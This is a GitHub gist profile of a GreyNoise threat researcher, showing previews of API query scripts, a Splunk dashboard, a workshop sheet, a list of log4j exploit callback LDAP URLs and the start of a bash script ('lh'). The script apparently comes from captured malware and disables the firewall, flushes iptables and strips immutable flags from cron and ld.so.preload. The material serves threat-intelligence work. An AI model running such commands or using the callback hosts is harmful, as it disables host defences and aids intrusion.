Skip to content

Instantly share code, notes, and snippets.

View superducktoes's full-sized avatar

Nick Roy superducktoes

17 followers · 4 following
  • GreyNoise
View GitHub Profile
@superducktoes
superducktoes / keybase.md
Created May 17, 2019 20:34

Keybase proof

I hereby claim:

  • I am superducktoes on github.
  • I am superducktoes (https://keybase.io/superducktoes) on keybase.
  • I have a public key whose fingerprint is B2C5 91D5 AF7C C0B6 F068 7567 0517 E3C4 ED54 7340

To claim this, I am signing this object:

@superducktoes
superducktoes / Callback Domains log4j
Last active April 4, 2022 15:33
Callback Domains log4j
ldap://e2216d7a9a31.bingsearchlib.com:39356/a
ldap://612877d3a59b.bingsearchlib.com:39356/a
ldap://205.185.115.217:47324/a
ldap://ab3419ba1f45.bingsearchlib.com:39356/a
ldap://193.3.19.159:53/c
ldap://ea62856c5fc3.bingsearchlib.com:39356/a
ldap://43065f484327.bingsearchlib.com:39356/a
ldap://5486b6edd688.bingsearchlib.com:39356/a
ldap://92d27039ede4.bingsearchlib.com:39356/a
ldap://45cecd2f38ca.bingsearchlib.com:39356/a
@superducktoes
superducktoes / lh
Created December 10, 2021 21:30
#!/bin/bash
ulimit -n 65535
chattr -i /etc/ld.so.preload
rm -f /etc/ld.so.preload
chattr -R -i /var/spool/cron
chattr -i /etc/crontab
ufw disable
iptables -F
@superducktoes
superducktoes / greynoise_query_large_data.py
Last active July 29, 2022 17:29
from greynoise import GreyNoise
import json
import csv
import argparse
import os
from stix2 import MemoryStore, Indicator
api_client = GreyNoise(api_key="")
parser = argparse.ArgumentParser()
@superducktoes
superducktoes / greynoise_stix_out.json
Created May 19, 2022 20:17
{
"type": "bundle",
"id": "bundle--156aade4-a0b9-4931-aef7-f400b2ffd1d7",
"objects": [
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--7f7cfee6-7cb4-4d8f-8012-bc5959a53564",
"created": "2022-05-19T20:10:17.632149Z",
"modified": "2022-05-19T20:10:17.632149Z",
@superducktoes
superducktoes / file_ips_lookup.py
Created June 3, 2022 18:25
import fileinput
import re
from greynoise import GreyNoise
# command usage: cat <file_ips>.txt| python3 file_ips_lookup.py
api_client = GreyNoise(api_key="")
ip_list = []
# parse file for ips
@superducktoes
superducktoes / GreyNoise Firewall Dashboard
Last active May 1, 2023 17:15
Firewall dashboard for Splunk enriching with GreyNoise data
<form theme="dark">
<label>GreyNoise Firewall Data</label>
<fieldset submitButton="false">
<input type="time" token="field1">
<label></label>
<default>
<earliest>-24h@h</earliest>
<latest>now</latest>
</default>
</input>
@superducktoes
superducktoes / workshop.txt
Last active November 8, 2022 22:15 — forked from Supriya-Maz/workshop.txt
GN Road Show Workshop
Stop Chasing Ghosts: California Roadshow
Cheat Sheet
You’re working at a sticker company called “Milk Co.” One of your developers leaves a vulnerable dev environment exposed to the internet. Users at the workshop will play the role of the Security Analyst at “Milk Co.” and have to investigate the alert to understand what happened, decide how they can stop additional attacks quickly, and then do additional investigation into indicators that can be used for hunting.
Question Answer Form
https://stopchasingghosts.typeform.com/to/JWKos6K2
[Optional] Slack Channel: Join GreyNoise Community Slack and find channel #roadshow-dc
@superducktoes
superducktoes / GreyNoise GNQL Query Results
Created November 1, 2022 22:23
Query GreyNoise without the GN SDK
import requests
import json
GN_API_KEY = ""
GN_QUERY = "last_seen:1d classification:malicious"
GN_QUERY_URL = "https://api.greynoise.io/v2/experimental/gnql"
HEADERS = {
"accept": "application/json",
@superducktoes
superducktoes / gn_query_write_to_file.py
Last active May 22, 2023 19:22
GreyNoise Write IP's To File
import requests
import json
GN_API_KEY = ""
GN_QUERY = 'tags:"SSH Bruteforcer" last_seen:1d spoofable:false'
file_name = "./greynoise_ips.txt"
GN_QUERY_URL = "https://api.greynoise.io/v2/experimental/gnql"